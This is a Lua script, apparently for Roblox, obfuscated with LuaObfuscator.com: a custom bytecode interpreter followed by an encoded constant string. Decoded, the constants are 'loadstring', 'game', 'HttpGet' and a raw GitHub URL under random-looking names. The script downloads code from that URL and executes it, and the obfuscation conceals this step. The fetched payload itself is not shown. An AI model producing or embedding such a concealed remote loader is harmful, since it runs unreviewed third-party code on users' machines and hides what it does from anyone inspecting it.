--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v109=v5(v89,v19);v19=nil;return v109;else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/(((1 + 4) -(880 -(282 + 595)))^(v32-1)))%((5 -3)^(((v33-1) -(v32-(1 -(1637 -(1523 + 114))))) + (2 -1))) ;return v90-(v90%((558 + 62) -(555 + 64))) ;else local v91=(933 -(857 + (105 -31)))^(v32-(569 -(367 + (1266 -(68 + 997))))) ;return (((v31%(v91 + v91))>=v91) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1270 -(226 + (1394 -(87 + 263))) ;local v36;local v37;while true do if (v35==(4 -3)) then return (v37 * (373 -(32 + 85))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v35=1 + (180 -(67 + 113)) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v41 * (12338840 + 4438376)) + (v40 * 65536) + (v39 * (1017 -761)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,2 -1 ,36 -16 ) * ((2 + 0)^(1029 -(393 + 522 + 82)))) + v42 ;local v46=v20(v43,59 -38 ,19 + 12 );local v47=((v20(v43,41 -(15 -6) )==(1188 -(1069 + 118))) and  -1) or (2 -1) ;if (v46==((438 -(145 + 293)) -(430 -(44 + 386)))) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=1 + 0 ;v44=791 -(368 + (1909 -(998 + 488))) ;end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * ((3 -2)/(442 -(416 + 9 + 17))))) or (v47 * NaN) ;end return v8(v47,v46-(3266 -2243) ) * (v44 + (v45/(2^52))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(773 -(201 + 571)) );v18=v18 + v48 ;local v50={};for v66=4 -3 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do local v108=(function() return 120 -(30 + 90) ;end)();while true do if ((0 + 0)==v108) then if (v101~=(1 + 0)) then else local v120=(function() return 0;end)();while true do if (v120==0) then local v122=(function() return 0 + 0 ;end)();while true do if (0==v122) then while true do if (v92~=(0 + 0)) then else v93=(function() return v94();end)();if (v95(v93, #"\\", #",")==0) then local v164=(function() return 0;end)();local v165=(function() return;end)();local v166=(function() return;end)();local v167=(function() return;end)();while true do if (v164~=(6 -3)) then else if (v95(v166, #"asd", #"xxx")~= #"~") then else v167[ #"0313"]=(function() return v98[v167[ #".dev"]];end)();end v99[v100]=(function() return v167;end)();break;end if (v164~=(0 -0)) then else local v171=(function() return 0 -0 ;end)();local v172=(function() return;end)();while true do if (0~=v171) then else v172=(function() return 0 + 0 ;end)();while true do if (v172==(1 + 0)) then v164=(function() return 1;end)();break;end if ((396 -(115 + 281))==v172) then local v179=(function() return 0;end)();while true do if (v179~=0) then else v165=(function() return v95(v93,4 -2 , #"91(");end)();v166=(function() return v95(v93, #"xnxx",6);end)();v179=(function() return 1 + 0 ;end)();end if (v179~=(2 -1)) then else v172=(function() return 1;end)();break;end end end end break;end end end if (v164~=1) then else local v173=(function() return 0 -0 ;end)();while true do if (v173==(868 -(550 + 317))) then v164=(function() return 2;end)();break;end if (v173==0) then v167=(function() return {v96(),v96(),nil,nil};end)();if (v165==(0 -0)) then local v177=(function() return 0 -0 ;end)();local v178=(function() return;end)();while true do if (v177==(0 -0)) then v178=(function() return 0;end)();while true do if (v178==0) then v167[ #"91("]=(function() return v96();end)();v167[ #".dev"]=(function() return v96();end)();break;end end break;end end elseif (v165== #"{") then v167[ #"asd"]=(function() return v97();end)();elseif (v165==2) then v167[ #"xxx"]=(function() return v97() -(2^16) ;end)();elseif (v165== #"-19") then local v184=(function() return 285 -(134 + 151) ;end)();local v185=(function() return;end)();while true do if (0~=v184) then else v185=(function() return 1665 -(970 + 695) ;end)();while true do if (v185==(0 -0)) then v167[ #"91("]=(function() return v97() -((1992 -(582 + 1408))^(55 -39)) ;end)();v167[ #".com"]=(function() return v96();end)();break;end end break;end end end v173=(function() return 1 -0 ;end)();end end end if (v164==2) then if (v95(v166, #"[", #"\\")~= #",") then else v167[7 -5 ]=(function() return v98[v167[2]];end)();end if (v95(v166,1826 -(1195 + 629) ,2 -0 )~= #"|") then else v167[ #"xnx"]=(function() return v98[v167[ #"91("]];end)();end v164=(function() return 3;end)();end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end end end if (v101==(241 -(187 + 54))) then local v121=(function() return 0;end)();while true do if (v121==0) then v92=(function() return 0;end)();v93=(function() return nil;end)();v121=(function() return 1;end)();end if (v121==1) then v101=(function() return 1;end)();break;end end end break;end end end end;end)();local v52=(function() return function(v102,v103,v104) local v105=(function() return 0;end)();while true do if (v105==0) then v102[v103-#"." ]=(function() return v104();end)();return v102,v103,v104;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"|",v57 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (0==v69) then v70=(function() return 0 + 0 ;end)();v71=(function() return nil;end)();v69=(function() return 1 + 0 ;end)();end if (v69~=(1 -0)) then else v72=(function() return nil;end)();while true do if (v70==(1 -0)) then if (v71== #"~") then v72=(function() return v21()~=(0 + 0) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"91(") then v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end if (v70==(1636 -(1373 + 263))) then local v118=(function() return 1000 -(451 + 549) ;end)();local v119=(function() return;end)();while true do if (0==v118) then v119=(function() return 0;end)();while true do if (v119==0) then v71=(function() return v21();end)();v72=(function() return nil;end)();v119=(function() return 1 + 0 ;end)();end if (v119~=(1 -0)) then else v70=(function() return 1;end)();break;end end break;end end end end break;end end end v56[ #"xxx"]=(function() return v21();end)();for v73= #"[",v23() do FlatIdent_24A02,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_24A02,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #"{",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[5 -3 ];local v65=v60[1387 -(746 + 638) ];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=1 + 0 ;local v80= -(1 -0);local v81={};local v82={...};local v83=v12("#",...) -(1582 -(1535 + 46)) ;local v84={};local v85={};for v106=0 + 0 ,v83 do if (v106>=v77) then v81[v106-v77 ]=v82[v106 + 1 + 0 + 0 ];else v85[v106]=v82[v106 + ((190 + 371) -(306 + 254)) ];end end local v86=(v83-v77) + 1 + 0 ;local v87;local v88;while true do local v107=0 -(0 -0) ;while true do if (v107==((2670 -(373 + 829)) -(899 + 568))) then if (v88<=(5 + 2)) then if (v88<=(1260 -((1774 -(476 + 255)) + (1344 -(369 + 761))))) then if ((v88<=(2 -1)) or (1263>2229)) then if (v88==(603 -(268 + 335))) then v85[v87[292 -(60 + 230) ]]();else v85[v87[(333 + 241) -((773 -347) + 146) ]]=v87[1 + (3 -1) ];end elseif (v88>(1458 -(282 + 1174))) then local v125=0;local v126;local v127;local v128;local v129;while true do if (v125==(811 -(569 + 242))) then v126=v87[322 -(53 + 267) ];v127,v128=v78(v85[v126](v13(v85,v126 + 1 + 0 ,v87[(246 -(64 + 174)) -5 ])));v125=1 + 0 ;end if (v125==(1025 -(706 + 46 + 272))) then v80=(v128 + v126) -((1 -0) + (336 -(144 + 192))) ;v129=1251 -(721 + 530) ;v125=2 + 0 ;end if ((2253==2253) and (v125==(852 -(20 + 830)))) then for v162=v126,v80 do local v163=1271 -(945 + (542 -(42 + 174))) ;while true do if (v163==(126 -(116 + 10))) then v129=v129 + 1 + 0 ;v85[v162]=v127[v129];break;end end end break;end end else v85[v87[4 -(2 + 0) ]]={};end elseif (v88<=(5 + 0)) then if ((452==452) and (v88==(2 + 2))) then local v131=v87[2 + 0 ];local v132=v85[v87[703 -(271 + 429) ]];v85[v131 + 1 + 0 + 0 ]=v132;v85[v131]=v132[v87[(5 + 5) -6 ]];else v85[v87[1502 -(1408 + 92) ]]();end elseif (v88==(1092 -(461 + 625))) then local v136=1288 -(993 + 295) ;local v137;while true do if (0==v136) then v137=v87[1 + 1 ];v85[v137]=v85[v137](v13(v85,v137 + (1172 -(418 + 753)) ,v80));break;end end else local v138=v87[5 -(1507 -(363 + 1141)) ];local v139=v85[v87[(1582 -(1183 + 397)) + 1 ]];v85[v138 + 1 + 0 ]=v139;v85[v138]=v139[v87[2 + 2 ]];end elseif ((v88<=(3 + 8)) or (4557<2087)) then if ((3874==3874) and (v88<=(538 -(406 + 123)))) then if (v88>(1777 -(1749 + 20))) then local v143=v87[1 + 1 ];v85[v143]=v85[v143](v13(v85,v143 + (1323 -(1249 + 73)) ,v80));else v85[v87[1 + 1 ]]=v87[1148 -(466 + 679) ];end elseif (v88>(18 -8)) then local v147=v87[5 -3 ];local v148,v149=v78(v85[v147](v13(v85,v147 + (2 -1) ,v87[3 + 0 ])));v80=(v149 + v147) -(2 -1) ;local v150=1900 -(106 + 1794) ;for v156=v147,v80 do v150=v150 + 1 + 0 ;v85[v156]=v148[v150];end else do return;end end elseif (v88<=13) then if (v88==(4 + 8)) then v85[v87[5 -3 ]]=v62[v87[7 -4 ]];else do return;end end elseif ((v88>(31 -17)) or (1938>4935)) then v85[v87[116 -(4 + 110) ]]=v62[v87[587 -(57 + 527) ]];else v85[v87[1429 -(41 + 1386) ]]={};end v79=v79 + (104 -(17 + 86)) ;break;end if (v107==(0 + 0)) then v87=v75[v79];v88=v87[1 -0 ];v107=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574036B3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F736B696437353433773768646768656474792F75686568756F7267686F6964696F6A7366672F726566732F68656164732F6D61696E2F6173666F696A676C6B73646C666B676473666700094Q000E7Q00120C000100013Q00120C000200023Q002007000200020003001208000400044Q0003000200044Q000600013Q00024Q0001000100012Q000D3Q00017Q00",v9(),...);
